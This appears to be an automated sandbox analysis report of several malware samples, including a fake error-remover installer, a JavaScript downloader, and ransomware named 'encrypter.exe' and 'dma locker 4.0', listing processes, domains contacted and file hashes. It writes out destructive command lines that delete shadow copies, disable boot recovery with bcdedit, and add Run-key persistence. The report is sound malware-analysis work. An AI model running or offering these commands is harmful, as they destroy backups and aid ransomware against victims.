"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Windows\Error file remover 1.0.0.0\install\0A01606\Error file remover.msi" AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /exelang 0 /noprereqs "

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 85C124E974A4815FD74652CF1F5EB6B7

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding D0DF24FCC7D9A7DE0396A15905B2F351 M Global\MSI0000

C:\Windows\system32\taskeng.exe

taskeng.exe {EDB707B6-9464-4A86-957E-8042D78A2628} S-1-5-21-3692679935-4019334568-335155002-1000:BCXRJFKE\Admin:Interactive:[1]

C:\Program Files (x86)\Windows\Error file remover\fatalerror.exe

"C:\Program Files (x86)\Windows\Error file remover\fatalerror.exe"

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x518

Network

Country Destination Domain Proto
US 8.8.8.8:53 collect.installeranalytics.com udp
US 3.214.180.211:80 collect.installeranalytics.com tcp
US 8.8.8.8:53 recoverpcerror.com udp
US 8.8.8.8:53 itsupport24by7.com udp

Files

\Users\Admin\AppData\Roaming\Windows\Error file remover 1.0.0.0\install\decoder.dll

MD5 3531cf7755b16d38d5e9e3c43280e7d2
SHA1 19981b17ae35b6e9a0007551e69d3e50aa1afffe
SHA256 76133e832c15aa5cbc49fb3ba09e0b8dd467c307688be2c9e85e79d3bf62c089
SHA512 7b053ba2cf92ef2431b98b2a06bd56340dad94de36d11e326a80cd61b9acb378ac644ac407cf970f4ef8333b8d3fb4ff40b18bb41ec5aee49d79a6a2adcf28fd

C:\Users\Admin\AppData\Roaming\Windows\Error file remover 1.0.0.0\install\0A01606\Error file remover.msi

MD5 27bc9540828c59e1ca1997cf04f6c467
SHA1 bfa6d1ce9d4df8beba2bedf59f86a698de0215f3
SHA256 05c18698c3dc3b2709afd3355ad5b91a60b2121a52e5fcc474e4e47fb8e95e2a
SHA512 a3ae822116cddb52d859de7ffc958541bb47c355a835c5129aade9cc0e5fba3ff25387061deb5b55b5694a535f09fe8669485282eb6e7c818cc7092eb3392848

C:\Windows\Installer\MSI7B19.tmp

MD5 d552dd4108b5665d306b4a8bd6083dde
SHA1 dae55ccba7adb6690b27fa9623eeeed7a57f8da1
SHA256 a0367875b68b1699d2647a748278ebce64d5be633598580977aa126a81cf57c5
SHA512 e5545a97014b5952e15bb321135f65c0e24414f8dd606fe454fd2d048d3f769b9318df7cfb2a6bf932eb2bf6d79811b93cb2008115deb0f0fa9db07f32a70969

C:\Users\Admin\AppData\Local\Temp\AdvinstAnalytics\Error file remover\1.0.0.0\{508A7E40-70C6-4BA4-B6A2-368AA3DBCC36}.session

MD5 5c58ea5b80d8472bd7eacc63bbea861a
SHA1 9add817c0e59f3ea96f7a08336d9d223b218d98c
SHA256 013cef8fe16201e72f55fa503a98a6abd36f53e188d3e05536e6330a7a95d09d
SHA512 0b34fb75a9e50a3bfbeaa0c9db30f871dad98ef6325eefd782b266cfdd8396f37bec35e551a3604fe01d571a789f6810795da2fb661bc7020bb7b287b30aac41

C:\Windows\Installer\MSI7CB1.tmp

MD5 4083cb0f45a747d8e8ab0d3e060616f2
SHA1 dcec8efa7a15fa432af2ea0445c4b346fef2a4d6
SHA256 252b7423b01ff81aea6fe7b40de91abf49f515e9c0c7b95aa982756889f8ac1a
SHA512 26f8949cad02334f9942fda8509579303b81b11bc052a962c5c31a7c6c54a1c96957f30ee241c2206d496d2c519d750d7f6a12b52afdb282fa706f9fee385133

C:\Users\Admin\AppData\Local\Temp\AdvinstAnalytics\Error file remover\1.0.0.0\tracking.ini

MD5 7ab1355b8ae96751a8e6f3d6c953cd34
SHA1 90e3fcb6fb0cc25cbfc602f8d9920adaa9986802
SHA256 abd27abe6af73b4e33b98f706250163f2fdbeaea452e900d108da5afb3283936
SHA512 af35de60b0e2cdfa8809aefd152918e549fc0ed2e5c672a0fff1811abff1ca6b837179c1fac73361b15f55f1f7b36709d61c89fe07848f5bb8a48d04d6ed9aac

C:\Users\Admin\AppData\Local\Temp\AdvinstAnalytics\Error file remover\1.0.0.0\tracking.ini

MD5 a93f81025eb9327246712b7d13ae0ece
SHA1 791c3f4441b5a62b815d63d205c1c552690dbbe6
SHA256 36f63277652d93a37a8fe93bc4a3533590ba92ca08eec97408ceac27978f3009
SHA512 2cef3c4c26c6dad4064c62d11835a9fd6c202649608c66ad535276c25a6faa550235385f3e817785768977c9f4bb6e8747c371980a6262553f9f7d79c47581aa

C:\Windows\Installer\MSI88F5.tmp

MD5 3cab78d0dc84883be2335788d387601e
SHA1 14745df9595f190008c7e5c190660361f998d824
SHA256 604e79fe970c5ed044517a9a35e4690ea6f7d959d21173ebef45cdd3d3a22bdd
SHA512 df6b49f2b5cddebd7e23e81b0f89e4883fc12d95735a9b3f84d2f402f4996c54b5fdea8adb9eaa98e8c973b089656d18d6b322bd71cb42d7807f7fa8a7348820

C:\Windows\Installer\MSI8935.tmp

MD5 7e6b88f7bb59ec4573711255f60656b5
SHA1 5e7a159825a2d2cb263a161e247e9db93454d4f6
SHA256 59ff5bc12b155cc2e666bd8bc34195c3750eb742542374fc5e53fb22d11e862f
SHA512 294a379c99403f928d476e04668717cdabc7dc3e33bcf6bcad5c3d93d4268971811ff7303aa5b4b2ed2b59d59c8eba350a9a30888d4b5b3064708521ac21439c

C:\Windows\Installer\MSI8974.tmp

MD5 aa82345a8f360804ea1d8d935f0377aa
SHA1 c09cf3b1666d9192fa524c801bb2e3542c0840e2
SHA256 9c155d4214cebda186647c035ada552963dcac8f88a6b38a23ea34f9ecd1d437
SHA512 c051a381d87ba933ea7929c899fb01af2207cb2462dcb2b55c28cff65596b27bdb05a48207624eeea40fddb85003133ad7af09ca93cfb2426c155daea5a9a6db

C:\Users\Admin\AppData\Roaming\Windows\Error file remover 1.0.0.0\install\0A01606\fatalerror.exe

MD5 e579c5b3c386262e3dd4150eb2b13898
SHA1 5ab7b37956511ea618bf8552abc88f8e652827d3
SHA256 e9573a3041e5a45ed8133576d199eb8d12f8922bbe47d194fef9ac166a96b9e2
SHA512 9cf947bad87a701f0e0ad970681767e64b7588089cd9064c72bf24ba6ca0a922988f95b141b29a68ae0e0097f03a66d9b25b9d52197ff71f6e369cde0438e0bb

C:\Users\Admin\AppData\Roaming\Windows\Error file remover 1.0.0.0\install\0A01606\Windows Logoff Sound.wav

MD5 bab1293f4cf987216af8051acddaf97f
SHA1 00abe5cfb050b4276c3dd2426e883cd9e1cde683
SHA256 bc26b1b97eeb45995bbd5f854db19f994cce1bb9ac9fb625eb207302dccdf344
SHA512 3b44371756f069be4f70113a09761a855d80e96c23c8cd76d0c19a43e93d1a159af079ba5189b88b5ee2c093099a02b00ea4dc20a498c9c0c2df7dc95e5ddd49

C:\Config.Msi\f7879a7.rbs

MD5 0f35c0f15e91bf2533656b0129fff225
SHA1 19dd9cfae6a1166a655d913aceee9bcbfd35991a
SHA256 7035ce433cd48a51a30c9599a65bfc4f86b94d37ddb1f3da5fd769976e111493
SHA512 57a41522b513cbe8f73738df977664744d3f71d2783eab03881b031c70b741a70271e3087e06d320c9215a7c338e006583003773f86feea2cff18f0a0fa90ffa

C:\Users\Admin\AppData\Local\Temp\AdvinstAnalytics\Error file remover\1.0.0.0\tracking.ini

MD5 68ff1ccfea788678e926d7d48f990cb8
SHA1 9748174737bf2759ce864ceb0a888be971ab22f6
SHA256 ae8e2145e52732ef616bb81433171b9a7a5633eb1017cb3687a72f3e35c6699d
SHA512 9db7b35e28cc343c693ca92671680cad584ed30d540e02fe2a7259ea6950024a856dfa6b9289f6ef5b1f0b51b81236507c03846382be50b1a7d025e154e1d988

memory/1436-285-0x0000000003790000-0x00000000047F2000-memory.dmp

Analysis: behavioral12

Detonation Overview

Submitted

2024-11-22 03:25

Reported

2024-11-22 14:10

Platform

win7-20241010-en

Max time kernel

287s

Max time network

319s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\downloader.js

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\system32\wscript.exe N/A
N/A N/A C:\Windows\system32\wscript.exe N/A
N/A N/A C:\Windows\system32\wscript.exe N/A
N/A N/A C:\Windows\system32\wscript.exe N/A

Reads user/profile data of web browsers

spyware stealer

Command and Scripting Interpreter: JavaScript

execution

Enumerates physical storage devices

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\notepad.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1736 wrote to memory of 2896 N/A C:\Windows\system32\wscript.exe C:\Windows\system32\cmd.exe
PID 1736 wrote to memory of 2896 N/A C:\Windows\system32\wscript.exe C:\Windows\system32\cmd.exe
PID 1736 wrote to memory of 2896 N/A C:\Windows\system32\wscript.exe C:\Windows\system32\cmd.exe

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\downloader.js

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\360390_tree.cmd" "

C:\Windows\system32\notepad.exe

notepad.exe C:\Users\Admin\AppData\Local\Temp\360390_readme.txt

C:\Windows\system32\reg.exe

REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "WinHelp" /t REG_SZ /F /D "C:\Users\Admin\AppData\Local\Temp\360390_readme.txt"

Network

Country Destination Domain Proto
US 8.8.8.8:53 locksmithspringfield.us udp
US 3.33.130.190:80 locksmithspringfield.us tcp
US 8.8.8.8:53 thecottagespsychotherapycenter.com udp
US 8.8.8.8:53 kashfianlaw.com udp
US 104.16.108.239:80 kashfianlaw.com tcp
US 8.8.8.8:53 www.kashfianlaw.com udp
US 104.16.109.239:443 www.kashfianlaw.com tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.200.3:80 c.pki.goog tcp
US 8.8.8.8:53 www.microsoft.com udp
BE 23.219.240.231:80 www.microsoft.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\360390_tree.cmd

MD5 d96f59d97099a6248989e828d766dd5b
SHA1 9322d296171970ce8a280a4c562f41b5f3689de0
SHA256 e534769d416412d6ea8e91faf108bd8f52838e854145eab052483c37b4add1e3
SHA512 562c52a4dab31d9fc8983823561d181ddd0d0999baf3cbe8841afd3919ae020df573f41bd58fe6ecd090d47a1a1d2bad6abd68955e329cd541974c12d4ceca8c

C:\Users\Admin\AppData\Local\Temp\360390_readme.txt

MD5 f6a2bb17bf99a4dab08f75504bf270b3
SHA1 d42b9acaa08e19e1708e0e00a7961b8dd3219102
SHA256 34d5153eb38ee664fc03fcb7de7a75a76c1162fa83110d34e6b64c29424ed6ed
SHA512 037a713b6e8580adf6773992b29b75dcae8d0284dee228deddb41149d89aafefc9d8bf4374d8437d57f6a26afede42accb629988b5cd234430f53f5df2da0a96

Analysis: behavioral17

Detonation Overview

Submitted

2024-11-22 03:25

Reported

2024-11-22 14:19

Platform

win7-20240708-en

Max time kernel

570s

Max time network

362s

Command Line

"C:\Users\Admin\AppData\Local\Temp\e6c4ae470977aa78d1005746ae05deea0bf3b4260f88865662a35f99b2559dbc_not_packed_maybe_useless.exe"

Signatures

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\e6c4ae470977aa78d1005746ae05deea0bf3b4260f88865662a35f99b2559dbc_not_packed_maybe_useless.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\e6c4ae470977aa78d1005746ae05deea0bf3b4260f88865662a35f99b2559dbc_not_packed_maybe_useless.exe

"C:\Users\Admin\AppData\Local\Temp\e6c4ae470977aa78d1005746ae05deea0bf3b4260f88865662a35f99b2559dbc_not_packed_maybe_useless.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 police-center.in udp

Files

C:\ProgramData\fjpnrwuutgmtath

MD5 b0304db30d33117ec0b5c29e6318e28f
SHA1 c1207d480e3fef671d2e4ca57a8bc5bd4deac7ac
SHA256 5e9c0c9ace2407ef793d68fbb8a46cca09c499a0a74309f397a2ecf15770c97b
SHA512 2976df7c9cb91770d4f652e78b3a3fca5f8729b942ccc82e1b0d7342333d5b635e417c440d4ada349001e90cd511e13779c7f25efa65773fe323853acd01c734

Analysis: behavioral24

Detonation Overview

Submitted

2024-11-22 03:25

Reported

2024-11-22 14:20

Platform

win7-20240903-en

Max time kernel

361s

Max time network

362s

Command Line

"C:\Users\Admin\AppData\Local\Temp\encrypter.exe"

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe

Deletes shadow copies

ransomware defense_evasion impact execution

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Reads user/profile data of web browsers

spyware stealer

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\encrypter.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\WMIC.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\encrypter.exe

"C:\Users\Admin\AppData\Local\Temp\encrypter.exe"

C:\Windows\SysWOW64\wbem\WMIC.exe

"C:\Windows\System32\wbem\WMIC.exe" process call create "cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures"

C:\Windows\system32\cmd.exe

cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\bcdedit.exe

bcdedit.exe /set {default} recoveryenabled no

C:\Windows\system32\bcdedit.exe

bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures

Network

N/A

Files

memory/2352-0-0x0000000000400000-0x000000000040A000-memory.dmp

memory/2352-2-0x0000000000400000-0x000000000040A000-memory.dmp

Analysis: behavioral11

Detonation Overview

Submitted

2024-11-22 03:25

Reported

2024-11-22 14:10

Platform

win7-20240903-en

Max time kernel

593s

Max time network

595s

Command Line

"C:\Users\Admin\AppData\Local\Temp\dma locker 4.0.exe"

Signatures

Deletes shadow copies

ransomware defense_evasion impact execution

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\ProgramData\\select.bat" C:\ProgramData\svchosd.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Firewall = "C:\\ProgramData\\svchosd.exe" C:\Users\Admin\AppData\Local\Temp\dma locker 4.0.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\ProgramData\\select.bat" C:\Users\Admin\AppData\Local\Temp\dma locker 4.0.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Firewall = "C:\\ProgramData\\svchosd.exe" C:\ProgramData\svchosd.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\T: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\V: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\M: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\Q: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\E: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\N: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\O: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\G: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\P: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\Y: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\F: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\P: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\F: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\I: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\S: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\T: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\L: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\R: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\W: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\D: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\N: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\R: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\D: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\G: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\A: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\U: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\K: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\M: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\S: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\H: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\J: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\K: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\L: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\J: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\Q: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\Y: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\E: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\O: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\V: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\X: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\B: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\I: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\U: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\B: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\W: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\A: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\H: C:\WINDOWS\system32\vssadmin.exe N/A
File opened (read-only) \??\X: C:\WINDOWS\system32\vssadmin.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\dma locker 4.0.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\svchosd.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A
N/A N/A C:\WINDOWS\system32\vssadmin.exe N/A

Suspicious behavior: RenamesItself

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\dma locker 4.0.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1892 wrote to memory of 892 N/A C:\Users\Admin\AppData\Local\Temp\dma locker 4.0.exe C:\Windows\system32\cmd.exe
PID 1892 wrote to memory of 892 N/A C:\Users\Admin\AppData\Local\Temp\dma locker 4.0.exe C:\Windows\system32\cmd.exe
PID 1892 wrote to memory of 892 N/A C:\Users\Admin\AppData\Local\Temp\dma locker 4.0.exe C:\Windows\system32\cmd.exe
PID 1892 wrote to memory of 892 N/A C:\Users\Admin\AppData\Local\Temp\dma locker 4.0.exe C:\Windows\system32\cmd.exe
PID 892 wrote to memory of 2204 N/A C:\Windows\system32\cmd.exe C:\WINDOWS\system32\vssadmin.exe
PID 892 wrote to memory of 2204 N/A C:\Windows\system32\cmd.exe C:\WINDOWS\system32\vssadmin.exe
PID 892 wrote to memory of 2204 N/A C:\Windows\system32\cmd.exe C:\WINDOWS\system32\vssadmin.exe
PID 1892 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\Temp\dma locker 4.0.exe C:\Windows\system32\cmd.exe
PID 1892 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\Temp\dma locker 4.0.exe C:\Windows\system32\cmd.exe
PID 1892 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\Temp\dma locker 4.0.exe C:\Windows\system32\cmd.exe
PID 1892 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\Temp\dma locker 4.0.exe C:\Windows\system32\cmd.exe
PID 1820 wrote to memory of 2676 N/A C:\Windows\system32\cmd.exe C:\WINDOWS\system32\vssadmin.exe
PID 1820 wrote to memory of 2676 N/A C:\Windows\system32\cmd.exe C:\WINDOWS\system32\vssadmin.exe
PID 1820 wrote to memory of 2676 N/A C:\Windows\system32\cmd.exe C:\WINDOWS\system32\vssadmin.exe
PID 1892 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\dma locker 4.0.exe C:\Windows\system32\cmd.exe
PID 1892 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\dma locker 4.0.exe C:\Windows\system32\cmd.exe
